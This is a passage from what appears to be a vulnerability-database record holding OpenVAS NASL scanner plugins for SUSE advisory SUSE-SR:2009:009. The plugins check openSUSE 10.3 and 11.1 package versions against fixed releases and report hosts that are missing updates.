isrpmvuln(pkg:\"koffice-planning\", rpm:\"koffice-planning~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-presentation\", rpm:\"koffice-presentation~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-python\", rpm:\"koffice-python~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-ruby\", rpm:\"koffice-ruby~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-spreadsheet\", rpm:\"koffice-spreadsheet~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-wordprocessing\", rpm:\"koffice-wordprocessing~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.6.2~22.9\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-apps-clients\", rpm:\"krb5-apps-clients~1.6.2~22.9\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-apps-servers\", rpm:\"krb5-apps-servers~1.6.2~22.9\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-client\", rpm:\"krb5-client~1.6.2~22.9\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.6.2~22.9\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.6.2~22.9\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~114~19.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~114~19.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openswan\", rpm:\"openswan~2.4.7~64.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openswan-doc\", rpm:\"openswan-doc~2.4.7~64.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.2.13~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.2.13~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.2.13~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.2.13~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.2.13~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.2.13~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sysconfig\", rpm:\"sysconfig~0.70.2~4.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"timezone\", rpm:\"timezone~2009d~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~114~19.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-devel\", rpm:\"xine-devel~1.1.8~14.14\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-extra\", rpm:\"xine-extra~1.1.8~14.14\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-lib\", rpm:\"xine-lib~1.1.8~14.14\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xpdf\", rpm:\"xpdf~3.02~19.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xpdf-tools\", rpm:\"xpdf-tools~3.02~19.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:42", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory SUSE-SR:2009:009. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.", "modified": "2018-04-06T00:00:00", "published": "2009-04-28T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063891", "id": "OPENVAS:136141256231063891", "title": "SuSE Security Summary SUSE-SR:2009:009", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sr_2009_009.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory SUSE-SR:2009:009\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SR:2009:009. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.\";\n\ntag_solution = \"Update all out of date packages.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63891\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-28 20:40:12 +0200 (Tue, 28 Apr 2009)\");\n script_cve_id(\"CVE-2008-4311\", \"CVE-2008-4989\", \"CVE-2009-0193\", \"CVE-2009-0196\", \"CVE-2009-0365\", \"CVE-2009-0578\", \"CVE-2009-0586\", \"CVE-2009-0658\", \"CVE-2009-0698\", \"CVE-2009-0790\", \"CVE-2009-0792\", \"CVE-2009-0922\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\", \"CVE-2009-1171\", \"CVE-2009-1241\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Summary SUSE-SR:2009:009\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~3.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox-branding-upstream\", rpm:\"MozillaFirefox-branding-upstream~3.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~3.0.8~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"NetworkManager\", rpm:\"NetworkManager~0.7.0.r4359~15.2.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"NetworkManager-devel\", rpm:\"NetworkManager-devel~0.7.0.r4359~15.2.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"NetworkManager-doc\", rpm:\"NetworkManager-doc~0.7.0.r4359~15.2.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"NetworkManager-glib\", rpm:\"NetworkManager-glib~0.7.0.r4359~15.2.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs\", rpm:\"aufs~cvs20081020~1.32.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-debug\", rpm:\"aufs-kmp-debug~cvs20081020_2.6.27.21_0.1~1.32.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-default\", rpm:\"aufs-kmp-default~cvs20081020_2.6.27.21_0.1~1.32.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-pae\", rpm:\"aufs-kmp-pae~cvs20081020_2.6.27.21_0.1~1.32.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-trace\", rpm:\"aufs-kmp-trace~cvs20081020_2.6.27.21_0.1~1.32.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-xen\", rpm:\"aufs-kmp-xen~cvs20081020_2.6.27.21_0.1~1.32.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.95.1~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"clamav-db\", rpm:\"clamav-db~0.95.1~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.3.9~7.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.3.9~7.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.3.9~7.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.3.9~7.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1\", rpm:\"dbus-1~1.2.10~5.4.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-devel\", rpm:\"dbus-1-devel~1.2.10~5.4.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-1-devel-doc\", rpm:\"dbus-1-devel-doc~1.2.10~5.4.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"deb\", rpm:\"deb~1.14.21~10.38.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2\", rpm:\"glib2~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-branding-upstream\", rpm:\"glib2-branding-upstream~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-devel\", rpm:\"glib2-devel~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-doc\", rpm:\"glib2-doc~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-lang\", rpm:\"glib2-lang~2.18.2~5.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel\", rpm:\"gnome-panel~2.24.1~2.26.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-devel\", rpm:\"gnome-panel-devel~2.24.1~2.26.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-doc\", rpm:\"gnome-panel-doc~2.24.1~2.26.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-extras\", rpm:\"gnome-panel-extras~2.24.1~2.26.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-lang\", rpm:\"gnome-panel-lang~2.24.1~2.26.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~2.4.1~24.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gpg2\", rpm:\"gpg2~2.0.9~25.108.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gpg2-lang\", rpm:\"gpg2-lang~2.0.9~25.108.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-base\", rpm:\"gstreamer-0_10-plugins-base~0.10.21~2.21.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-base-devel\", rpm:\"gstreamer-0_10-plugins-base-devel~0.10.21~2.21.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-base-doc\", rpm:\"gstreamer-0_10-plugins-base-doc~0.10.21~2.21.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer-0_10-plugins-base-lang\", rpm:\"gstreamer-0_10-plugins-base-lang~0.10.21~2.21.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk\", rpm:\"java-1_6_0-openjdk~1.4_b14~24.4.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-demo\", rpm:\"java-1_6_0-openjdk-demo~1.4_b14~24.4.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-devel\", rpm:\"java-1_6_0-openjdk-devel~1.4_b14~24.4.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-javadoc\", rpm:\"java-1_6_0-openjdk-javadoc~1.4_b14~24.4.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-plugin\", rpm:\"java-1_6_0-openjdk-plugin~1.4_b14~24.4.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-openjdk-src\", rpm:\"java-1_6_0-openjdk-src~1.4_b14~24.4.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-akonadi\", rpm:\"kde4-akonadi~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-akonadi-devel\", rpm:\"kde4-akonadi-devel~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-akregator\", rpm:\"kde4-akregator~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-dolphin\", rpm:\"kde4-dolphin~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kaddressbook\", rpm:\"kde4-kaddressbook~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kalarm\", rpm:\"kde4-kalarm~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kdepasswd\", rpm:\"kde4-kdepasswd~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kdialog\", rpm:\"kde4-kdialog~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kdm\", rpm:\"kde4-kdm~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kdm-branding-upstream\", rpm:\"kde4-kdm-branding-upstream~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-keditbookmarks\", rpm:\"kde4-keditbookmarks~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kfind\", rpm:\"kde4-kfind~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kgreeter-plugins\", rpm:\"kde4-kgreeter-plugins~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kinfocenter\", rpm:\"kde4-kinfocenter~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kjots\", rpm:\"kde4-kjots~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kmail\", rpm:\"kde4-kmail~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-knode\", rpm:\"kde4-knode~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-knotes\", rpm:\"kde4-knotes~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-konqueror\", rpm:\"kde4-konqueror~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-konsole\", rpm:\"kde4-konsole~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kontact\", rpm:\"kde4-kontact~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-korganizer\", rpm:\"kde4-korganizer~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-ktimetracker\", rpm:\"kde4-ktimetracker~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-ktnef\", rpm:\"kde4-ktnef~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kwin\", rpm:\"kde4-kwin~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kde4-kwrite\", rpm:\"kde4-kwrite~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4\", rpm:\"kdebase4~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4-libkonq\", rpm:\"kdebase4-libkonq~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4-nsplugin\", rpm:\"kdebase4-nsplugin~4.1.3~3.8.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4-runtime\", rpm:\"kdebase4-runtime~4.1.3~4.2.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4-workspace\", rpm:\"kdebase4-workspace~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4-workspace-branding-upstream\", rpm:\"kdebase4-workspace-branding-upstream~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4-workspace-devel\", rpm:\"kdebase4-workspace-devel~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdebase4-workspace-ksysguardd\", rpm:\"kdebase4-workspace-ksysguardd~4.1.3~10.3.7\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdelibs4\", rpm:\"kdelibs4~4.1.3~4.10.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdelibs4-core\", rpm:\"kdelibs4-core~4.1.3~4.10.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdelibs4-doc\", rpm:\"kdelibs4-doc~4.1.3~4.10.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3\", rpm:\"kdepim3~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-devel\", rpm:\"kdepim3-devel~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-kpilot\", rpm:\"kdepim3-kpilot~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-mobile\", rpm:\"kdepim3-mobile~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-notes\", rpm:\"kdepim3-notes~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-time-management\", rpm:\"kdepim3-time-management~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim4\", rpm:\"kdepim4~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim4-devel\", rpm:\"kdepim4-devel~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim4-wizards\", rpm:\"kdepim4-wizards~4.1.3~3.14.9\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepimlibs4\", rpm:\"kdepimlibs4~4.1.3~5.2.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-extra\", rpm:\"kernel-debug-extra~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-extra\", rpm:\"kernel-default-extra~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-extra\", rpm:\"kernel-pae-extra~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.27.21~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.27.21~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace-extra\", rpm:\"kernel-trace-extra~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-extra\", rpm:\"kernel-xen-extra~2.6.27.21~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kio_iso\", rpm:\"kio_iso~1.99.2.beta2~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kitchensync\", rpm:\"kitchensync~3.5.10~8.14.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"klamav\", rpm:\"klamav~0.46~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice\", rpm:\"koffice~1.6.3~211.12.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif 